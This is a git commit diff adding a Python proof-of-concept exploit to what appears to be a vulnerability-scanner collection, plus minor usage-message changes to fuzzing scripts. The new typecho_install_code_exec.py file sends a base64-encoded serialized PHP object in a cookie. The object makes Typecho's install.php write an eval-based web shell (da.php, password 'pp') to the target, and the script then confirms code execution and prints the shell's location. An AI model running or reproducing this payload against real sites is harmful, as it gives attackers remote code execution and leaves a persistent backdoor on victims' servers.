add poc typecho install.php反序列化漏洞

2017-11-05 13:36:33 +08:00
parent 31fd33aeed
commit 98779e0b2d
7 changed files with 61 additions and 5 deletions
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -6,6 +6,9 @@ referer: unknow
 author: Lucifer
 description: 包含所有cms漏洞类型，封装成一个模块
 '''
+#typecho vuls
+from cms.typecho.typecho_install_code_exec import typecho_install_code_exec_BaseVerify
+
 #foosun vuls
 from cms.foosun.foosun_City_ajax_sqli import foosun_City_ajax_sqli_BaseVerify

--- a/cms/seacms/seacms_search_jq_code_exec.py
+++ b/cms/seacms/seacms_search_jq_code_exec.py
@@ -35,4 +35,4 @@ class seacms_search_jq_code_exec_BaseVerify:
 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = seacms_search_jq_code_exec_BaseVerify(sys.argv[1])
-    testVuln.run()
+    testVuln.run()
--- a/cms/typecho/init.py
+++ b/cms/typecho/init.py
--- a/cms/typecho/typecho_install_code_exec.py
+++ b/cms/typecho/typecho_install_code_exec.py
@@ -0,0 +1,44 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: typecho install.php反序列化命令执行
+referer: http://p0sec.net/index.php/archives/114/
+author: Lucifer
+description: 漏洞产生在install.php中，base64后的值被反序列化和实例化后发生命令执行。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class typecho_install_code_exec_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
+            "Cookie":"__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6NDp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMjoiAFR5cGVjaG9fRmVlZABfY2hhcnNldCI7czo1OiJVVEYtOCI7czoxOToiAFR5cGVjaG9fRmVlZABfbGFuZyI7czoyOiJ6aCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NTY6ImZpbGVfcHV0X2NvbnRlbnRzKCdkYS5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbcHBdKTs/PicpIjt9czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfZmlsdGVyIjthOjE6e2k6MDtzOjY6ImFzc2VydCI7fX19fX1zOjY6InByZWZpeCI7czo3OiJ0eXBlY2hvIjt9",
+            "Referer":self.url + "/install.php",
+            "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+            "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+            "Accept-Encoding":"gzip, deflate",
+        }
+        vulnurl = self.url + "/install.php?finish=1"
+        try:
+            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+            shellpath = self.url + "/da.php"
+            post_data ={
+                "pp":"phpinfo();"
+            }
+            req1 = requests.post(self.url + "/da.php", data=post_data, headers=headers, timeout=10, verify=False)
+            if r"Configuration File (php.ini) Path" in req1.text:
+                cprint("[+]存在typecho install.php反序列化命令执行漏洞...(高危)\tpayload: "+vulnurl+"\tshell地址: "+shellpath+"\t密码: pp", "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = typecho_install_code_exec_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/pocdb.py
+++ b/pocdb.py
@@ -24,6 +24,7 @@ class pocdb_pocs:
            "crossdomain.xml文件发现":crossdomain_find_BaseVerify(url),
        }
        self.cmspocdict = {
+            "typecho install.php反序列化命令执行":typecho_install_code_exec_BaseVerify(url),
            "Dotnetcms(风讯cms)SQL注入漏洞":foosun_City_ajax_sqli_BaseVerify(url),
            "韩国autoset建站程序phpmyadmin任意登录漏洞":autoset_phpmyadmin_unauth_BaseVerify(url),
            "phpstudy探针":phpstudy_probe_BaseVerify(url),
--- a/scan/arbitrarily_filefuzz_check.py
+++ b/scan/arbitrarily_filefuzz_check.py
@@ -188,5 +188,9 @@ class arbitrarily_filefuzz_check_BaseVerify:

 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
-    testVuln = arbitrarily_filefuzz_check_BaseVerify(sys.argv[1])
-    testVuln.run()
+    if len(sys.argv) < 2:
+        cprint("usage: python3 arbitrarily_filefuzz_check.py http://test.com/download.php?file=FUZZING", "cyan")
+        cprint("[*]将需要测试文件操作参数替换为FUZZING即可", "cyan")
+    else:
+        testVuln = arbitrarily_filefuzz_check_BaseVerify(sys.argv[1])
+        testVuln.run()
--- a/scan/xss_characterfuzz_check.py
+++ b/scan/xss_characterfuzz_check.py
@@ -116,5 +116,9 @@ class xss_characterfuzz_check_BaseVerify:

 if __name__ == "__main__":
    warnings.filterwarnings("ignore")
-    testVuln = xss_characterfuzz_check_BaseVerify(sys.argv[1])
-    testVuln.run()
+    if len(sys.argv) < 2:
+        cprint("usage: python3 xss_characterfuzz_check.py http://test.com/test.php?id=FUZZING", "cyan")
+        cprint("[*]将需要测试XSS的参数替换为FUZZING即可", "cyan")
+    else:
+        testVuln = xss_characterfuzz_check_BaseVerify(sys.argv[1])
+        testVuln.run()